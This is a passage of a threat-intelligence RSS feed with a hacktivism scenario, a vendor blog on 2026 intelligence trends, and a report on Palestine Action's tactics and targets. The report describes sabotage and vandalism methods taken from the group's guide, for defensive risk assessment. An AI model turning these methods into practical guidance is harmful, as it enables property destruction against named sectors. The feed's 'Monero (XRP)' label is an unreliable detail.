        <p>Groups claiming to be patriotic hacktivists from both countries conduct hack-and-leak operations and website defacements. These are amplified by partisans on social media who often exaggerate the impact of these attacks.</p>
        <ul>
          <li><strong>Competitive disadvantage:</strong> Hack-and-leak operations expose sensitive internal documents, including proprietary trade secrets and embarrassing communications.</li>
          <li><strong>Increased surveillance risk:</strong> The conflict increases domestic surveillance activity in Country B to monitor for internal threats. International employees traveling to Country B are subject to enhanced surveillance.</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <p>Actors claiming to be hacktivists supporting Country A escalate cyber operations, carrying out persistent cyberattacks against Country B’s electrical grid. As a result, Country B experiences rolling blackouts in the capital city.</p>
        <ul>
          <li><strong>Operational disruption:</strong> The blackouts prevent call centers from performing essential business functions, resulting in significant service delays and revenue losses for corporations worldwide.</li>
          <li><strong>Physical security risk:</strong> Anger over blackouts increases public support for escalating operations against Country A. The escalation of conflict increases the risk of harm to employees or the destruction of facilities.</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <p>The United States and China become increasingly involved in the conflict between Country A and Country B, providing military, logistical, and cyber capabilities to their preferred country. The external support prolongs the conflict and increases the risk of involving neighboring countries.</p>
        <ul>
          <li><strong>Conflict escalation:</strong> With more weapons and logistical support from great power backers, fighting between Country A and Country B expands from the border to strikes further in the interior. Both military and civilian casualties increase as violence escalates.</li>
          <li><strong>Regional economic impact:</strong> Extended disruptions may cause international corporations to move operations to more stable regions, leading to a negative economic impact in the region.</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://www.recordedfuture.com/ko/research/influence-operations-and-conflict-escalation-in-south-asia">Influence Operations and Conflict Escalation in South Asia</a></li>
          <li><a href="https://www.recordedfuture.com/ko/research/apt32-malware-campaign">New APT32 Malware Campaign Targets Cambodian Government</a></li>
          <li><a href="https://substack.com/inbox/post/180401534?r=3g10gt&amp;utm_medium=ios&amp;triedRedirect=true">From Pegasus to Pall Mall: Managing Risks of Offensive Cyber Capabilities</a></li>
          <li><a href="https://assets.recordedfuture.com/insikt-report-pdfs/2023/cta-2023-0112.pdf">Current Trends in the Turkish Language Dark Web</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1a43602f57ec7a07f0637d7b7010998c1f0bcbc8d.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[What’s Next for Enterprise Threat Intelligence in 2026]]></title>
            <link>https://www.recordedfuture.com/ko/blog/whats-next-for-enterprise-threat-intelligence-in-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/whats-next-for-enterprise-threat-intelligence-in-2026</guid>
            <pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Top enterprise threat intelligence trends for 2026: AI-augmented CTI, unified platforms, workflow integration, data fusion, budgets, ROI, and maturity.]]></description>
            <content:encoded><![CDATA[
        <h2>Introduction</h2>
        <p>The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.</p>
        <p>The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">2025 State of Threat Intelligence Report</a> found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.</p>
        <p>This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.</p>
        <p>Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.</p>
        <h2>Key Trends Driving Threat Intelligence Evolution</h2>
        <p>There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.</p>
        <ul>
          <li><strong>Vendor Consolidation for Unified Intelligence:</strong> Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.</li>
          <li><strong>Deeper Integration into Security Workflows:</strong> Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.</li>
          <li><strong>Automation and AI Augmentation:</strong> To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.</li>
          <li><strong>Fusion of Internal and External Data:</strong> Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).</li>
        </ul>
        <h2>Challenges Holding Team Backs Today</h2>
        <p>Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.</p>
        <ul>
          <li><strong>Integration Gaps:</strong> Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.</li>
          <li><strong>Credibility and Trust Issues:</strong> Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.</li>
          <li><strong>Signal-to-Noise Overload:</strong> With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.</li>
          <li><strong>Lack of Context for Action:</strong> Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.</li>
        </ul>
        <p>These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.</p>
        <h2>Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned</h2>
        <p>In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).</p>
        <p>Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.</p>
        <p>Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.</p>
        <p>Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.</p>
        <h2>Implications for 2026 Security Budgets and Investments</h2>
        <p>As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.</p>
        <p>One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.</p>
        <p>Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.</p>
        <div>
          <div>
            <div>After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow…. We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.</div>
          </div>
          <div>
            <div><strong>Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company</strong></div>
          </div>
        </div>
        <p>Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.</p>
        <p>That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.</p>
        <p>Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.</p>
        <h2>Charting the Course to 2026</h2>
        <p>Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.</p>
        <p>By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.</p>
        <p>So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like <a href="https://www.recordedfuture.com/ko/resources/maturity-assessment">Recorded Future’s Threat Intelligence Maturity Assessment</a> provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.</p>
        <p>With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_18741ecd2e5bc1f72686d64726aaa4419be1e620f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Palestine Action: Operations and Global Network]]></title>
            <link>https://www.recordedfuture.com/ko/research/palestine-action-operations-and-global-network</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/palestine-action-operations-and-global-network</guid>
            <pubDate>Thu, 11 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explores Palestine Action’s post-designation global network, tactics, and targets, and evaluates key physical risks and mitigations for organizations.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.</p>
        <p>Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.</li>
          <li>Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.</li>
          <li>The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.</li>
          <li>The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.</li>
          <li>In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.</li>
        </ul>
        <h2>Palestine Action: History and Terrorism Designation</h2>
        <p>Palestine Action was <a href="https://web.archive.org/web/20210530081122/https://palestineaction.org/the-launch-of-palestine-action/">founded</a> in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. The almost certain core purpose of Palestine Action is to <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">promote</a> militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">focused</a> its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.</p>
        <p>Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">reported</a> that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”</p>
        <p>The frequency and scope of Palestine Action’s operations in the UK almost certainly <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">increased</a> following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. <strong>Figure 1</strong> (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_149bfd2b732d8d0ef9b2dd07170bc16c93226b7c6.png?width=750&amp;format=png&amp;optimize=medium" width="1428" height="738" />
        </p>
        <p><em><strong>Figure 1</strong>: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)</em></p>
        <p>The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, <a href="https://www.bbc.com/news/articles/cx24nppdx0lo">operation</a> in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack <a href="https://apnews.com/article/raf-brize-norton-palestine-action-planes-8467a20bcd088e24c3fe061852b33ba2">caused</a> over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper <a href="https://hansard.parliament.uk/commons/2025-06-23/debates/25062337000014/PalestineActionProscription">announced</a> the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially <a href="https://www.legislation.gov.uk/uksi/2025/803/pdfs/uksiem_20250803_en_001.pdf">designated</a> a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for being convicted of being a Palestine Action member.</p>
        <p>Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally <a href="https://www.bbc.com/news/articles/ce9dg5v43vmo">challenge</a> the ban and garner public support for its cause through a <a href="https://www.bbc.com/news/articles/ceq2e9x19g8o">series</a> of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.</p>
        <p>However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (<strong>Figure 2</strong>) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_12151bbf3b847608b6c89f0a881a17286c50082ea.png?width=750&amp;format=png&amp;optimize=medium" width="1409" height="663" /><br /><em><strong>Figure 2:</strong></em> <em>Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)</em>
        </p>
        <p>Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its <em>de facto</em> moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.</p>
        <h2>Palestine Action’s Tactics, Techniques, Procedures, and Targets</h2>
        <p>Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.</p>
        <p>Across the globe, Palestine Action and similar groups’ almost certainly primary targets are the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.</p>
        <h3>Direct Action TTPs</h3>
        <p>Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:</p>
        <ul>
          <li>Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.</li>
          <li>Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.</li>
          <li>Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.</li>
          <li>Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
            <ul>
              <li>If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.</li>
              <li>If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.</li>
            </ul>
          </li>
        </ul>
        <h4>Vandalism</h4>
        <p>Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.</p>
        <p>These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_10e806cffcc88b90ce3d873718b05e1904a5c2fb0.png?width=750&amp;format=png&amp;optimize=medium" width="934" height="502" />
        </p>
        <p><em><strong>Figure 3</strong>: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)</em></p>
        <h4>Obstruction</h4>
        <p>Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c0b3ea7939281ba6720a594996ce304846f148cf.png?width=750&amp;format=png&amp;optimize=medium" width="800" height="450" />
        </p>
        <p><em><strong>Figure 4:</strong></em> <em>Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source:</em> <em><a href="https://www.bbc.com/news/uk-england-beds-bucks-herts-67519517">BBC</a>)</em></p>
        <p>Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13c10409dc1a57c4f5f1e968bab131a61780ca022.png?width=750&amp;format=png&amp;optimize=medium" width="675" height="900" />
        </p>
        <p><em><strong>Figure 5:</strong></em> <em>Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)</em></p>
        <h4>Sabotage</h4>
        <p>Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.</p>
        <p>The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group <a href="https://www.bbc.com/news/videos/czxwvp7lykko">shows</a> activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the plane’s engines and striking the plane with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly <a href="https://covertaccessteam.substack.com/p/the-raf-brize-norton-breach-what">due</a> to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton <a href="https://www.reuters.com/business/aerospace-defense/four-pro-palestinian-activists-charged-over-uk-military-base-break-in-2025-07-03/">led</a> to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c315d371b4cb1477f8fe5f99e66778bb49f47d21.png?width=750&amp;format=png&amp;optimize=medium" width="465" height="262" />
        </p>
        <p><em><strong>Figure 6:</strong></em> <em>Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)</em></p>
        <p>Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol <a href="https://www.reuters.com/world/uk/nine-deny-attack-israeli-firm-elbits-uk-warehouse-2025-01-17/">breached</a> an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation <a href="https://www.reuters.com/world/uk/nine-deny-attack-israeli-firm-elbits-uk-warehouse-2025-01-17/">caused</a> over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">label</a> the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists <a href="https://www.bbc.com/news/articles/c9wj144zd7po">accessed</a> the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.</p>
        <h3>Targets</h3>
        <p>Palestine Action’s <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">primary target</a> in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">conducted</a> notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">targeted</a> other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.</p>
        <p>As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.</p>
        <h2>Palestine Action’s Global Network</h2>
        <p>Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.</p>
        <p>We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in <strong>Table 1</strong>, our four-part classification labels Palestine Action network groups as either Palestine Action <strong>franchises</strong>, <strong>affiliates</strong>, <strong>offshoots</strong>, or <strong>partners</strong>, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.</p>
        <div>
          <div>
            <div><strong>Label</strong></div>
            <div><strong>Nexus</strong></div>
